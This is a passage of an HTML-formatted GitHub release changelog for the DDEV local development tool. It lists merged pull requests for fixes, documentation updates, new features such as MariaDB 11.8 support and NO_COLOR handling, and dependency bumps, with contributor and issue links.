<li>fix: make <code>ddev composer create-project</code> work with stdin by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3095010950" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7336" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7336/hovercard" href="https://github.com/ddev/ddev/pull/7336">#7336</a></li>
<li>docs: update <code>vendor/bin/composer</code> examples, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2690906182" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/6772" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/6772/hovercard" href="https://github.com/ddev/ddev/pull/6772">#6772</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3100899710" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7344" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7344/hovercard" href="https://github.com/ddev/ddev/pull/7344">#7344</a></li>
<li>docs: align Craft CMS quickstart with official documentation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AugustMiller/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AugustMiller">@AugustMiller</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3081284122" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7323" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7323/hovercard" href="https://github.com/ddev/ddev/pull/7323">#7323</a></li>
<li>docs: update ngrok link by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tyler36/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tyler36">@tyler36</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3129344164" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7359" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7359/hovercard" href="https://github.com/ddev/ddev/pull/7359">#7359</a></li>
<li>feat: display user-defined <code>router-compose.*.yaml</code> on <code>ddev start</code> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3124295317" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7355" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7355/hovercard" href="https://github.com/ddev/ddev/pull/7355">#7355</a></li>
<li>test: update check for starter page in Silverstripe CMS by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3134017612" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7368" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7368/hovercard" href="https://github.com/ddev/ddev/pull/7368">#7368</a></li>
<li>fix: Allow Docker Desktop for Linux (DDFL) but warn about it, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3070705914" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7307" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7307/hovercard" href="https://github.com/ddev/ddev/issues/7307">#7307</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3131534271" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7363" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7363/hovercard" href="https://github.com/ddev/ddev/pull/7363">#7363</a></li>
<li>build: Update google/go-github to v72, remove obsolete dependencies, replaces <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3134897028" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7369" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7369/hovercard" href="https://github.com/ddev/ddev/pull/7369">#7369</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3135007023" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7370" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7370/hovercard" href="https://github.com/ddev/ddev/pull/7370">#7370</a></li>
<li>feat: add <code>DDEV_USER</code> env var for <code>web</code> container user, sync env tests with docs by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3132974301" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7365" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7365/hovercard" href="https://github.com/ddev/ddev/pull/7365">#7365</a></li>
<li>feat: Support new LTS MariaDB 11.8 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2852206437" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/6983" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/6983/hovercard" href="https://github.com/ddev/ddev/pull/6983">#6983</a></li>
<li>refactor: clarify comment on legacy PostgreSQL, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3081505394" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7324" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7324/hovercard" href="https://github.com/ddev/ddev/pull/7324">#7324</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3149191328" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7382" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7382/hovercard" href="https://github.com/ddev/ddev/pull/7382">#7382</a></li>
<li>build: use yaml/go-yaml instead of unmaintained yaml.v3, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3053107712" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7280" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7280/hovercard" href="https://github.com/ddev/ddev/issues/7280">#7280</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3147648381" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7381" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7381/hovercard" href="https://github.com/ddev/ddev/pull/7381">#7381</a></li>
<li>feat: add shell completion for <code>ddev config</code> and <code>ddev config global</code> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3124890603" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7356" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7356/hovercard" href="https://github.com/ddev/ddev/pull/7356">#7356</a></li>
<li>docs: improve xhgui documention, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3142578579" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7376" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7376/hovercard" href="https://github.com/ddev/ddev/issues/7376">#7376</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/michaellenahan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/michaellenahan">@michaellenahan</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3142580760" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7377" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7377/hovercard" href="https://github.com/ddev/ddev/pull/7377">#7377</a></li>
<li>fix: Remove COMPOSE_CONVERT_WINDOWS_PATHS to make Rancher Desktop (Windows) work by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3142048240" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7375" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7375/hovercard" href="https://github.com/ddev/ddev/pull/7375">#7375</a></li>
<li>build: bump ddev-webserver and ddev-traefik-router, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3056644384" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7282" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7282/hovercard" href="https://github.com/ddev/ddev/issues/7282">#7282</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3142624940" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7378" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7378/hovercard" href="https://github.com/ddev/ddev/pull/7378">#7378</a></li>
<li>test: Add testing for wsl2 mirrored networking, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3144173603" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7379" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7379/hovercard" href="https://github.com/ddev/ddev/issues/7379">#7379</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3146961597" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7380" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7380/hovercard" href="https://github.com/ddev/ddev/pull/7380">#7380</a></li>
<li>test: remove <code>TestCmdAddon</code> leftovers in <code>~/.ddev</code> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3159350806" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7387" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7387/hovercard" href="https://github.com/ddev/ddev/pull/7387">#7387</a></li>
<li>feat: display user-defined <code>ssh-auth-compose.*.yaml</code> on <code>ddev start</code> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3159391762" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7388" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7388/hovercard" href="https://github.com/ddev/ddev/pull/7388">#7388</a></li>
<li>feat: improve images cleanup in <code>ddev delete images</code>, <code>ddev delete</code>, <code>ddev clean</code>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="1788288152" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/5073" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/5073/hovercard" href="https://github.com/ddev/ddev/issues/5073">#5073</a>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2988930401" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7201" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7201/hovercard" href="https://github.com/ddev/ddev/issues/7201">#7201</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2950402294" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7151" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7151/hovercard" href="https://github.com/ddev/ddev/pull/7151">#7151</a></li>
<li>refactor: normalize defaults in <code>ddev help config</code> and <code>ddev help config global</code>, update docs by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3157999769" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7386" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7386/hovercard" href="https://github.com/ddev/ddev/pull/7386">#7386</a></li>
<li>build: remove go-homedir, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3133682064" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7366" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7366/hovercard" href="https://github.com/ddev/ddev/issues/7366">#7366</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3160711778" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7390" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7390/hovercard" href="https://github.com/ddev/ddev/pull/7390">#7390</a></li>
<li>test: use <code>main</code> for  setup-homebrew action instead of <code>master</code> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chenrui333/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chenrui333">@chenrui333</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3166254681" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7395" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7395/hovercard" href="https://github.com/ddev/ddev/pull/7395">#7395</a></li>
<li>build: upgrade mapstructure to v2 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dolmen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dolmen">@dolmen</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3167828127" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7396" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7396/hovercard" href="https://github.com/ddev/ddev/pull/7396">#7396</a></li>
<li>test: use bats-core/bats-core homebrew tap instead of kaos by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3179310097" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7405" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7405/hovercard" href="https://github.com/ddev/ddev/pull/7405">#7405</a></li>
<li>fix: treat argument as literal in <code>ddevcd</code> despite leading dash by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3175485352" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7401" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7401/hovercard" href="https://github.com/ddev/ddev/pull/7401">#7401</a></li>
<li>fix: make DdevProjectConfig include overrides, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2953760198" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7154" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7154/hovercard" href="https://github.com/ddev/ddev/issues/7154">#7154</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3169016125" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7397" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7397/hovercard" href="https://github.com/ddev/ddev/pull/7397">#7397</a></li>
<li>feat: Improve elevation/escalation for hosts editing, including WSL2, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2435830235" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/6440" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/6440/hovercard" href="https://github.com/ddev/ddev/issues/6440">#6440</a>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="1884743555" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/5324" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/5324/hovercard" href="https://github.com/ddev/ddev/issues/5324">#5324</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3163925981" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7392" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7392/hovercard" href="https://github.com/ddev/ddev/pull/7392">#7392</a></li>
<li>test: Pin umbrelladocs/action-linkspector@v1.2.5 temporarily to sort out failures [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3183239694" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7411" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7411/hovercard" href="https://github.com/ddev/ddev/pull/7411">#7411</a></li>
<li>docs: Improve windows install docs by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3182889823" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7410" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7410/hovercard" href="https://github.com/ddev/ddev/pull/7410">#7410</a></li>
<li>fix: make xdg-utils optional, use explorer.exe on WSL2 [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3175744349" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7402" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7402/hovercard" href="https://github.com/ddev/ddev/pull/7402">#7402</a></li>
<li>test: Ignore existing golangci-lint/revive package complaints by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3188507482" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7415" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7415/hovercard" href="https://github.com/ddev/ddev/pull/7415">#7415</a></li>
<li>ci: use <code>skip-package-name-checks</code>, pin <code>golangci-lint</code> to v2.2.1, remove <code>only-new-issues</code>, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3188507482" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7415" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7415/hovercard" href="https://github.com/ddev/ddev/pull/7415">#7415</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3189011475" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7416" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7416/hovercard" href="https://github.com/ddev/ddev/pull/7416">#7416</a></li>
<li>build: bump umbrelladocs/action-linkspector from 1.2.5 to 1.3.5 by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3189563866" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7417" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7417/hovercard" href="https://github.com/ddev/ddev/pull/7417">#7417</a></li>
<li>fix: route all logging through <code>output</code> to respect <code>--json-output</code> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3176659369" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7403" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7403/hovercard" href="https://github.com/ddev/ddev/pull/7403">#7403</a></li>
<li>docs: add blog and add-on registry to navigation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3199533374" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7427" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7427/hovercard" href="https://github.com/ddev/ddev/pull/7427">#7427</a></li>
<li>build: Use new cooldown to slow dependabot updates [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3196858199" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7425" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7425/hovercard" href="https://github.com/ddev/ddev/pull/7425">#7425</a></li>
<li>feat: add <code>NO_COLOR</code> variable support, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2903115814" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7058" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7058/hovercard" href="https://github.com/ddev/ddev/issues/7058">#7058</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3191850514" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7419" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7419/hovercard" href="https://github.com/ddev/ddev/pull/7419">#7419</a></li>
<li>refactor: centralize table style configuration by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3209009093" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7434" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7434/hovercard" href="https://github.com/ddev/ddev/pull/7434">#7434</a></li>
<li>fix: use <code>output.UserOut</code> for JSON output, retry on invalid input in interactive <code>ddev config</code>, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3176659369" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7403" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7403/hovercard" href="https://github.com/ddev/ddev/pull/7403">#7403</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3208962790" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7433" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7433/hovercard" href="https://github.com/ddev/ddev/pull/7433">#7433</a></li>
<li>build: drop direct dependency on <code>github.com/pkg/errors</code> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3208720989" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7432" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7432/hovercard" href="https://github.com/ddev/ddev/pull/7432">#7432</a></li>
<li>feat: add JSON output to <code>ddev -v</code> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3208524138" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7431" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7431/hovercard" href="https://github.com/ddev/ddev/pull/7431">#7431</a></li>
<li>refactor: move <code>ddevapp.RenderHomeRootedDir</code> to <code>fileutil.ShortHomeJoin</code> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3208121343" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7430" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7430/hovercard" href="https://github.com/ddev/ddev/pull/7430">#7430</a></li>
<li>docs: add Terminus downgrade tips, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3120651596" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7352" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7352/hovercard" href="https://github.com/ddev/ddev/issues/7352">#7352</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bserem/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bserem">@bserem</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3121116868" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7353" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7353/hovercard" href="https://github.com/ddev/ddev/pull/7353">#7353</a></li>
